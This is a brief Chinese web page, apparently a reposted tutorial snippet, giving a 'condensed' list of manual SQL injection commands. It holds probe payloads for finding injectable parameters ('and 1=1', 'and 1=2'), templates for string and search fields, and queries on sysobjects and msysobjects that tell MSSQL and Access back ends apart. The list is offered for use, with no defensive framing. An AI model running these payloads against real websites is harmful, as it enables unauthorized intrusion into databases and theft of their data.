手动方式SQL注入脚本命令之精华版

来源:互联网 发布:是京东好还是淘宝好 编辑:程序博客网 时间:2024/04/29 06:58

1.判断是否有注入;and 1=1 ;and 1=2

2.初步判断是否是mssql ;and user>0

3.注入参数是字符'and [查询条件] and ''='

4.搜索时没过滤参数的'and [查询条件] and '%25'='

5.判断数据库系统

;and (select count(*) from sysobjects)>0 mssql

;and (select count(*) from msysobjects)>0 access
 

0 0
原创粉丝点击